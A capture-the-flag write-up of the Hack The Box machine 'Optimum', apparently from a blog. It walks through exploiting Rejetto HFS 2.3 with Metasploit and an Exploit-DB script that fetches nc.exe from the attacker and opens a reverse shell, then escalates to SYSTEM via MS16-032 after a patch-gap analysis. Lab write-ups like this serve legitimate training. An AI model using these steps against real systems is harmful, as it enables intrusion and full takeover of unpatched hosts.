HTB : Optimum

rarpunzel
5 min read · Sep 2, 2020

1. Executive Summary

Optimum is a Windows machine that exposes only port 80, running Rejetto HTTP File Server (HFS). According to the scan result, the HFS version in use is 2.3, which is outdated and has a publicly known remote command execution bug.

Besides the outdated HTTP File Server, the vulnerability used on this machine is MS16-032: Secondary Logon Handle Privilege Escalation.

2. Description

2.1 Enumeration

The first thing to do in the footprinting or enumeration process is to know who your target is. In this case our target is 10.10.10.8.

Using nmap, I scanned the host and found only one open port, 80. Port 80 is used for HTTP services and, based on the service banner, it runs HttpFileServer (HFS) version 2.3.

2.2 Exploitation

Now that we know the HFS version, the next step is looking for a way to exploit the service.

Google is always the answer, especially for me, a noob.

From Google I found out that there is a Metasploit module for this vulnerability, rejetto_hfs_exec.

While using the module, I have to set the target to the host's IP, 10.10.10.8.

msf > use exploit/windows/http/rejetto_hfs_exec

msf exploit(rejetto_hfs_exec) > show options // to see which options the module requires

msf exploit(rejetto_hfs_exec)> set RHOSTS 10.10.10.8

msf exploit(rejetto_hfs_exec) > run

After running the exploit, I found the user flag in C:\Users\kostas\Desktop\user.txt.txt.

Since I'm preparing for the OSCP, I decided to find other ways to exploit it, especially as it is well known that the use of Metasploit is limited in the exam. So I have to start now on not being so 'needy' for Metasploit. Sorry Metasploit, but I still love you tho…

Going back to Google to find the original exploit script, I found one on Exploit-DB (https://www.exploit-db.com/exploits/39161).

Based on my understanding of the script, it abuses the HFS macro engine: a null byte (%00) in the search parameter stops the search handler, and the {.exec|...} macro that follows is executed instead of being searched for (CVE-2014-6287). The script uses that to drop and run a small VBScript that downloads nc.exe from the attacking machine, then runs nc.exe with a reverse connection back to our listener.

So I copied nc.exe to my working directory, so that it can be served to the target machine, with the command below.

cp /usr/share/windows-binaries/nc.exe /opt/HTB/optimum

Next, nc.exe is served with Python's built-in HTTP server. The script fetches it from http://<your IP>/nc.exe with no port in the URL, so the server has to listen on port 80 (binding port 80 needs root). Start it with the command below.

python -m SimpleHTTPServer 80

In a different window, don't forget to start a listener; I used port 4444.

nc -lnvp 4444

Now that everything is set, back to the exploit script. Two things in it need to be modified: the IP address and the port are those of the attacking machine (your listener), not the target.

ip_addr = "10.10.14.5" #local IP address
local_port = "4444" #listener's port

Now run the script, which takes the target IP and port as arguments (python exploit.py 10.10.10.8 80), until a shell shows up on the listener; it may take more than one attempt.

And there you are, you have the user flag. Congratulations!

2.3 Privilege Escalation

Usually the root flag is saved in C:\Users\Administrator\Desktop, but when I tried to access the Administrator directory I got access denied, so I had to look for another way.

Running systeminfo (or sysinfo in meterpreter) is a must when the target is Windows. Once we have the systeminfo output from the target, we can feed it to a magic tool called Windows Exploit Suggester. If the hotfix list comes back as "N/A", wmic qfe list prints the installed KBs instead.

The tool compares the hotfixes installed on the target against Microsoft's security bulletin database and lists the bulletins that are missing, flagging those with a public exploit. https://github.com/AonCyberLabs/Windows-Exploit-Suggester.

I tried to install the tool on my machine, but unfortunately I had a problem with the Python module xlrd (even though I had already installed and upgraded it).

So I used Metasploit to install the tool. First I downloaded the git repository using the command in the screenshot below.

And since I used Metasploit, pip was not installed there. Pip is needed to install the other module.

(Screenshots: pip installation; xlrd installation.)

After installing pip and xlrd, I tried to run the script and it showed that it needed to update its database, so I re-ran the script with "--update" appended.

Now back to our tool. In the same terminal, I used the command below to run it against the saved systeminfo output.

python windows-exploit-suggester.py --systeminfo systeminfo.txt --database 2018-11-25-mssb.xls

Within a second, a list of missing bulletins shows up in the terminal. The tool reports many of them; among those, one that is worth trying is MS16-032.
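What the tool does with systeminfo.txt, as an added Python 3 example (my code, not Windows-Exploit-Suggester's): it parses the OS name and installed KBs out of a constructed systeminfo excerpt and compares them with a small hand-built bulletin table that stands in for the MSSB spreadsheet. The KB numbers for MS16-032 and MS15-051 come from those bulletins; the sample hotfix list and the table itself are illustrative and should be checked against the real database.

```python
#!/usr/bin/env python3
"""Added example (my code, not Windows-Exploit-Suggester): the comparison the
tool performs between systeminfo output and a security-bulletin database."""
import re

# Constructed sample in the layout systeminfo prints; not the real Optimum output.
SYSTEMINFO_SAMPLE = """\
Host Name:                 OPTIMUM
OS Name:                   Microsoft Windows Server 2012 R2 Standard
OS Version:                6.3.9600 N/A Build 9600
System Type:               x64-based PC
Hotfix(s):                 2 Hotfix(s) Installed.
                           [01]: KB2919355
                           [02]: KB3045171
"""

# Hand-built stand-in for the MSSB spreadsheet: bulletin -> (title, affected
# OS name fragments, KBs that close the bulletin). KB numbers are taken from
# the two bulletins; verify them against the real database before relying on them.
BULLETINS = {
    "MS16-032": (
        "Secondary Logon Elevation of Privilege",
        ("Windows 7", "Windows 8.1", "Windows Server 2008", "Windows Server 2012"),
        {"KB3139914"},
    ),
    "MS15-051": (
        "Win32k Elevation of Privilege",
        ("Windows 7", "Windows 8.1", "Windows Server 2008", "Windows Server 2012"),
        {"KB3045171"},
    ),
}


def parse_systeminfo(text):
    """Return (os_name, set of installed KB ids) from systeminfo output."""
    m = re.search(r"^OS Name:\s+(.+?)\s*$", text, re.M)
    os_name = m.group(1) if m else ""
    # hotfix lines look like "[01]: KB2919355"; the "N Hotfix(s) Installed." line is skipped
    hotfixes = set(re.findall(r"\[\d+\]:\s*(KB\d+)", text))
    return os_name, hotfixes


def missing_bulletins(os_name, hotfixes, bulletins=BULLETINS):
    """Bulletins that apply to this OS and whose fixing KB is not installed.

    A bulletin only counts as missing if the OS is in its affected list and
    none of the KBs that close it appear in the hotfix list.
    """
    missing = []
    for bid, (title, affects, kbs) in bulletins.items():
        if not any(a in os_name for a in affects):
            continue  # does not apply to this OS
        if kbs & hotfixes:
            continue  # already patched
        missing.append((bid, title))
    return missing


if __name__ == "__main__":
    os_name, kbs = parse_systeminfo(SYSTEMINFO_SAMPLE)
    print(f"[*] {os_name}: {len(kbs)} hotfix(es) installed")
    for bid, title in missing_bulletins(os_name, kbs):
        print(f"[E] {bid}: {title}")
```

Two practical notes: the real tool also needs the OS version and architecture to pick the right KB per platform, and its database is Microsoft's MSSB spreadsheet, which stopped being updated in 2017, so for newer targets a tool with a current feed is needed.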

Now that we know the bulletin, we have to look for the exploit. I googled "MS16-032", which led me to a git repository.

I downloaded 41020.exe, went back to meterpreter and uploaded it to the machine.

According to the screenshot, we are still kostas, because 41020.exe has not yet been run on the machine.

Note: after the exploit runs, the new shell is NT AUTHORITY\SYSTEM, the Local System account. It is a powerful account with unrestricted access to all local system resources.

Now try to access C:\Users\Administrator\Desktop again.

Finally got root!
